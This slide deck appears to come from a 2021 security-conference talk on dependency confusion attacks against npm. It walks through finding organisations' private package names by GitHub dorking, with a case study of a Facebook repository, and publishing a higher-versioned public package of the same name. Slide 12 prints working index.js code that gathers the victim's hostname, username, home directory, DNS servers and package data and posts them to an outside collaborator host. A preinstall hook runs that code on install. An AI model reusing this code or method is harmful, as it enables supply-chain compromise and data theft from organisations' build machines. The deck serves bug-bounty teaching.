Slide 1

Slide 1 text

Bug Bounty Hunter and Trainer Red Team Ops @Agri10x Masters In Cyber Security @UEA Interested in WebApps, Functional Exploits and Bikes INDIAN WHOAMI ?

Slide 2

Slide 2 text

Dependecy Confusion

Slide 3

Slide 3 text

What is Dependency Confusion ??? A Dependency Confusion attack, also known as a supply chain substitution attack, occurs when a software installer script is tricked into downloading a malicious code file from a public repository rather than the intended file of the same name from an internal repository.

Slide 4

Slide 4 text

No content

Slide 5

Slide 5 text

Difference ??? 1. As seen in the above image, the Public Package contains a higher version than the Private Package. 2. As a result, if the package indexing is not completed properly, it will automatically retrieve the Higher version package from the Public Registry.

Slide 6

Slide 6 text

How to find Private Packages ? Within Organization, use Github Dorking with keywords like package.json org:Samsung package.json Use filters like : language:json org:Samsung package.json language:json org:target_org package.json language:json

Slide 7

Slide 7 text

No content

Slide 8

Slide 8 text

It can be also found using npm package.json disclosure nuclei template.

Slide 9

Slide 9 text

Case Study https://github.com/facebook/flipper/blob/45ce538c8dd6b44 8388a01e2ed4fa398956e5e20/desktop/eslint-plugin- flipper/package.json 1. 2. Package Name: eslint-plugin-flipper 3. Type: Private wget https://github.com/facebook/flipper/blob/45ce538c8dd6b44 8388a01e2ed4fa398956e5e20/desktop/eslint-plugin- flipper/package.json

Slide 10

Slide 10 text

We have to check if private package exist or not We have to check on offcial website : https://www.npmjs.com/

Slide 11

Slide 11 text

Install NPM using the following command Creating Malicious Packages (NPM) apt install npm npm login npm init : Create package 1. 2. 3.

Slide 12

Slide 12 text

After successful creation of the package.json file , we need to edit the created file to execute our own scripts and command. Index.js const os = require("os");const dns = require("dns");const querystring = require("querystring");const https = require("https");const packageJSON = require("./package.json");const package = packageJSON.name;const trackingData = JSON.stringify({p: package,c: __dirname,hd: os.homedir(),hn: os.hostname(),un: os.userInfo().username,dns: dns.getServers(),r: packageJSON ? packageJSON.___resolved : undefined,v: packageJSON.version,pjson: packageJSON,});var postData = querystring.stringify({msg: trackingData,});var options = {hostname: "burpcollaborator.net", //replace burpcollaborator.net with Interactsh or pipedreamport: 443,path: "/",method: "POST",headers: {"Content-Type": "application/x-www-form-urlencoded","Content-Length": postData.length,},};var req = https.request(options, (res) => {res.on("data", (d) => {process.stdout.write(d);});});req.on("error", (e) => {// console.error(e);});req.write(postData);req.end();

Slide 13

Slide 13 text

Now there will be two files created package.json , index.js. Before publishing the package to public registry make sure this package name Doesn’t exist in the Public Registry. Use the following command to publish the package. Pushing into Public Registry (NPM)

Slide 14

Slide 14 text

No content

Slide 15

Slide 15 text

The Published package contains Higher Version compared to the original one.

Slide 16

Slide 16 text

packages, our package.json file preinstall scripts will execute the index.js file and obtain the hostname, directory, IP address, and username as shown below.

Slide 17

Slide 17 text

Thank you guys DAMNcon2021